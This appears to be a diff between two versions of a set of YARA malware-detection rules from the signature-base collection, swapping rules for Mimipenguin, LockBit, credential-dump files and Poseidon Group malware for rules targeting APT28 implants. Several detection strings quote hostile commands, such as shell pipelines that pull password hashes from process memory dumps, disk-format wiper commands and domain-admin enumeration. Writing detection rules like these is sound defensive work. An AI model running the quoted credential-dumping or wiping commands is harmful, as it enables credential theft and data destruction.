+         F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE
+         8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D
+         D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE
+         8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1
+         EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80
+         E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B
+         D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsharefinder : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V19 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bb485347-ea9b-5f26-99ad-bedc38bfecd5"
-		date = "2023-12-19"
-		modified = "2025-08-18"
-		reference = "https://github.com/mvelazc0/SharpShareFinder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4982-L4994"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "b4efdb3c-d7d6-5141-ad73-90d70582f8bd"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L378-L404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72b2c6c9f4da68ba8e9656ff2d9da962f9d791f031c1d7fb74d74ddd17ba49de"
-		score = 75
-		quality = 83
+		logic_hash = "42bee6ddf0b13774efb6712135c3e0b4eae6364120f8973272820f5f669671d1"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "64bfeb18-b65c-4a83-bde0-b54363b09b71" ascii nocase wide
+		$obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6
+         74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2
+         E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC
+         89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE
+         9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11
+         BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D
+         CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B }
+		$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01
+         00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E
+         0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32
+         45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC
+         C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05
+         42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14
+         81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Postdump : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V20 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "7f33e76c-0227-5c23-b821-c5c9753e2384"
-		date = "2023-12-19"
-		modified = "2025-08-18"
-		reference = "https://github.com/YOLOP0wn/POSTDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4997-L5009"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "323ee676-802d-55e6-a97a-48eb3a4e4a5f"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L406-L423"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e5bbef2fe7122855d7e5300ebf78631149e60b08793a4a21a4ac8b337f4bee60"
-		score = 75
-		quality = 83
+		logic_hash = "72c62a764c5c7c19a07957fd6fbfcffd689900cc2759d408d239fe08a3b76b9c"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "e54195f0-060c-4b24-98f2-ad9fb5351045" ascii nocase wide
+		$func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42
+         FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1
+         8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4
+         8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45
+         D8 89 55 F8 72 A0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Mimipenguin_SH
+rule SIGNATURE_BASE_IMPLANT_3_V1
 {
 	meta:
-		description = "Detects Mimipenguin Password Extractor - Linux"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c670f6fe-562d-598f-a73f-45e4ab234f7d"
-		date = "2017-04-01"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L8-L22"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "d539bb31-18b2-5cf5-b994-daecd5f8c771"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L425-L442"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d9827e7adfe667a4a46e23854cac3b63949abcde5709045f0fe65e7b5704265"
-		score = 75
+		logic_hash = "4c7b6c76bc10784abf96cc71b34ffc9a9de569fd536505528752221d22b26629"
+		score = 85
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$(echo $thishash | cut -d'$' -f 3)" ascii
-		$s2 = "ps -eo pid,command | sed -rn '/gnome\\-keyring\\-daemon/p' | awk" ascii
-		$s3 = "MimiPenguin Results:" ascii
+		$STR1 = ">process isn't exist<" ascii wide
+		$STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide
+		$STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide
+		$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
+		$STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14
+         02 8a 45 ?? 03 fa}
 
 	condition:
-		1 of them
+		any of them
 }
-rule SIGNATURE_BASE_Mimipenguin_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_3_V2 : FILE
 {
 	meta:
-		description = "Detects Mimipenguin hack tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "62754337-52ef-5d3f-af2f-52f820ba0476"
-		date = "2017-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L34-L50"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "349c65cf-547f-5837-af71-f9721e029b74"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L444-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "60a7b64eee9e2adfbc65fb5762f18e2abc4a35f9368ad704754870b5e8311391"
-		score = 75
+		logic_hash = "0a658888dcc7b7f4620f08449c6ec492756750e64f15b048f7cdee7de4fc0479"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e8d13fe27c93c7571075abf84a839fd1d31d8f2e3e48b3f4c6c13f7afcf8cbd"
 
 	strings:
-		$x1 = "self._strings_dump += strings(dump_process(target_pid))" fullword ascii
-		$x2 = "def _dump_target_processes(self):" fullword ascii
-		$x3 = "self._target_processes = ['sshd:']" fullword ascii
-		$x4 = "GnomeKeyringPasswordFinder()" ascii
+		$base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74
+         02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B
+         FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7
+         45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45
+         ?? 33 35}
+		$base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE
+         72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B
+         FF 55 8B EC 83 EC 10 A1 33 35 }
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
 }
-rule SIGNATURE_BASE_Mimipenguin_2 : FILE
+rule SIGNATURE_BASE_IMPLANT_3_V3 : FILE
 {
 	meta:
-		description = "Detects Mimipenguin hack tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3bb1ba9-cbfc-53fd-81d0-256466ace4de"
-		date = "2017-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimipenguin.yar#L52-L69"
+		description = "X-Agent/CHOPSTICK Implant by APT28"
+		author = "US CERT"
+		id = "ce82511e-715a-53cb-98e5-5d51b94726d5"
+		date = "2017-02-10"
+		modified = "2021-03-15"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L466-L485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "53a1f47ef9c94ef6bffbc9d7b9f3a8e0a7fb132c0936ea27e6be775cf99792a0"
-		score = 75
+		logic_hash = "313f837b90bcf09455427e4411acb5406f4dae9d69373d8d2c0cfc014e27ee96"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "453bffa90d99a820e4235de95ec3f7cc750539e4023f98ffc8858f9b3c15d89a"
 
 	strings:
-		$x1 = "DUMP=$(strings \"/tmp/dump.${pid}\" | grep -E" fullword ascii
-		$x2 = "strings /tmp/apache* | grep -E '^Authorization: Basic.+=$'" fullword ascii
-		$x3 = "grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A" fullword ascii
-		$x4 = "strings \"/tmp/dump.${pid}\" | grep -E -m 1 '^\\$.\\$.+\\$')\"" fullword ascii
-		$x5 = "if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then" fullword ascii
+		$STR1 = ".?AVAgentKernel@@"
+		$STR2 = ".?AVIAgentModule@@"
+		$STR3 = "AgentKernel"
+		$fp1 = "Panda Security S.L." wide
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of ( $STR* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Rc4_Win_Feb24 : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V1 : FILE
 {
 	meta:
-		description = "Detect the implementation of RC4 Algorithm by Lockbit4.0"
-		author = "0x0d4y"
-		id = "4de48ced-b9fa-4286-aac4-c263ad20d67d"
-		date = "2024-02-13"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_rc4_win_feb24.yar#L1-L21"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "be4d222f-009f-5dde-93da-376626a77263"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L487-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "062311f136d83f64497fd81297360cd4"
-		logic_hash = "85e8087f875c45ce39b7014fc0737dc86f1e18d4643fdbb0a80d18feff774680"
-		score = 100
+		logic_hash = "51135d9fe62f5fd1fb7ef6c386dcdd86525dd469064662c2314cfee6e952d6ec"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
 
 	strings:
-		$rc4_alg = { 48 3d 00 01 00 00 74 0c 88 84 04 ?? ?? ?? ?? 48 ff c0 eb ec 29 c9 41 b8 ?? ?? ?? ?? 4c 8d 0d 15 7b 00 00 45 31 d2 48 81 f9 00 01 00 00 74 34 44 8a 9c 0c ?? ?? ?? ?? 45 00 da 89 c8 99 41 f7 f8 46 02 14 0a 41 0f b6 c2 8a 94 04 ?? ?? ?? ?? 88 94 0c ?? ?? ?? ?? 44 88 9c 04 ?? ?? ?? ?? 48 ff c1 eb c3 29 c0 48 8b 0d 14 9e 00 00 31 d2 45 29 c0 48 3d ?? ?? ?? ?? 74 4b 41 ff c0 45 0f b6 c0 46 8a 8c 04 ?? ?? ?? ?? 44 00 ca 44 0f b6 d2 46 8a 9c 14 ?? ?? ?? ?? 46 88 9c 04 ?? ?? ?? ?? 46 88 8c 14 ?? ?? ?? ?? 46 02 8c 04 ?? ?? ?? ?? 45 0f b6 c9 46 8a 8c 0c ?? ?? ?? ?? 44 30 0c 01 48 ff c0 eb ad }
+		$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64
+         C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF
+         32 C6 45 E0 2EE9 ?? ?? ?? ??}
+		$STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0
+            46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $rc4_alg
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 1 of them
 }
-rule SIGNATURE_BASE_NTLM_Dump_Output
+rule SIGNATURE_BASE_IMPLANT_4_V2 : FILE
 {
 	meta:
-		description = "NTML Hash Dump output file - John/LC format"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d17ee473-317b-57d4-8ea8-7c89e8f2b2ed"
-		date = "2015-10-01"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L17-L30"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "2edaeb08-19bc-5ab4-bc75-40c16ba85d9f"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L505-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "154de926d27d38b38a4ed2c14b9122213fd1deb4115ef3bb77366db0818c7572"
-		score = 75
+		logic_hash = "dd4edd238cdc3d376c1d5bcea6c8df57f4ef03369c0ca22107241812e0a1bb94"
+		score = 85
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "500:AAD3B435B51404EEAAD3B435B51404EE:" ascii
-		$s1 = "500:aad3b435b51404eeaad3b435b51404ee:" ascii
+		$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64}
+		$BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32}
+		$CONSTANT = {26 80 AC C8}
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Gsecdump_Password_Dump_File : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V3_Alternativerule : HIGHVOL FILE
 {
 	meta:
-		description = "Detects a gsecdump output file"
+		description = "Detects a group of different malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c7c8ab61-f728-5eb2-a5e3-b3dd84980870"
-		date = "2018-03-06"
-		modified = "2023-12-05"
-		reference = "https://t.co/OLIj1yVJ4m"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L32-L45"
+		id = "47e9028b-7718-5372-8a1a-94c208c29ed4"
+		date = "2017-02-12"
+		modified = "2025-07-01"
+		reference = "US CERT Grizzly Steppe Report"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L788-L803"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "483ad5217cbc065bd2f791c473b9a2455fddc4e0123268a8d37c64d92dd78c43"
-		score = 65
+		logic_hash = "35468f7699b96fcaaaa032eef7dae34ec314e9c652f9f8b2e8ca7343fb5cec50"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
+		comment = "Alternative rule - not based on the original samples but samples on which the original rule matched"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
 
 	strings:
-		$x1 = "Administrator(current):500:" ascii
+		$op1 = { 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 53 1e 01 00 }
+		$op2 = { 21 da 40 00 00 a0 40 00 08 a0 40 00 b0 70 40 00 }
 
 	condition:
-		uint32be( 0 ) == 0x41646d69 and filesize < 3000 and $x1 at 0
+		( uint16( 0 ) == 0x5a4d and all of them )
 }
-rule SIGNATURE_BASE_SUSP_ZIP_Ntdsdit : T1003_003 FILE
+rule SIGNATURE_BASE_IMPLANT_4_V4 : FILE
 {
 	meta:
-		description = "Detects ntds.dit files in ZIP archives that could be a left over of administrative activity or traces of data exfiltration"
-		author = "Florian Roth (Nextron Systems)"
-		id = "131ed73d-bb34-5ff6-b145-f95e4469d7f9"
-		date = "2020-08-10"
-		modified = "2023-12-05"
-		reference = "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_dumps.yar#L47-L60"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "27a5fb98-fe8b-561c-b490-e04257e7dd1c"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L807-L822"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "371e30f50d96c884bd55ffc10d049d0ada881304746564a99dec0e8efad87602"
-		score = 50
+		logic_hash = "49c912f29f5ffbd90366a510285ef3f06c804af86829808c175c8be519ce01c4"
+		score = 85
 		quality = 85
-		tags = "T1003_003, FILE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "ntds.dit" ascii
+		$DK_format1 = "/c format %c: /Y /Q" ascii
+		$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
+		$DK_physicaldrive = "PhysicalDrive%d" wide
+		$DK_shutdown = "shutdown /r /t %d"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and $s1 in ( 0 .. 256 )
+		uint16( 0 ) == 0x5A4D and all of ( $DK* )
 }
-rule SIGNATURE_BASE_Poseidongroup_Malware : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V5 : FILE
 {
 	meta:
-		description = "Detects Poseidon Group Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fe8b227a-d93d-5540-ba73-3f20358205f6"
-		date = "2016-02-09"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L8-L48"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "d203f3c6-4e86-5632-ad5d-61763ee59bbe"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L824-L838"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "315d540f2d2cb7b55e1a069cef8dd2eeceabcea4a428b33cf520a0f23d3819ea"
+		logic_hash = "9d4233ccf148919d0ad0be726b9dfa9e26a9afcebb7b26fa4db4c3da8c46d13e"
 		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
-		hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
-		hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
-		hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
-		hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
-		hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
-		hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
 
 	strings:
-		$s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii
-		$s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii
-		$s3 = "c:\\windows\\command.com" fullword ascii
-		$s4 = "copy \"%s\" \"%s\" /Y" fullword ascii
-		$s5 = "http://%s/files/" ascii
-		$s6 = "\"%s\". %s: \"%s\"." fullword ascii
-		$s7 = "0x0666" fullword ascii
-		$s8 = "----------------This_is_a_boundary$" fullword ascii
-		$s9 = "Server 2012" fullword ascii
-		$s10 = "Server 2008" fullword ascii
-		$s11 = "Server 2003" fullword ascii
-		$a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii
-		$a2 = "net.exe group \"Admins. do Dom" fullword ascii
-		$a3 = "(SVRID=%d)" fullword ascii
-		$a4 = "(TG=%d)" fullword ascii
-		$a5 = "(SVR=%s)" fullword ascii
-		$a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$a7 = "net.exe localgroup Administradores" fullword ascii
+		$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 650KB and 6 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $a* ) )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Poseidongroup_Maldoc_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V7 : FILE
 {
 	meta:
-		description = "Detects Poseidon Group - Malicious Word Document"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ab26455a-d468-5a75-a6e2-61701ca3a1df"
-		date = "2016-02-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L50-L64"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "a0dda12a-22b6-53e6-9528-8c178ad871ad"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L859-L881"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
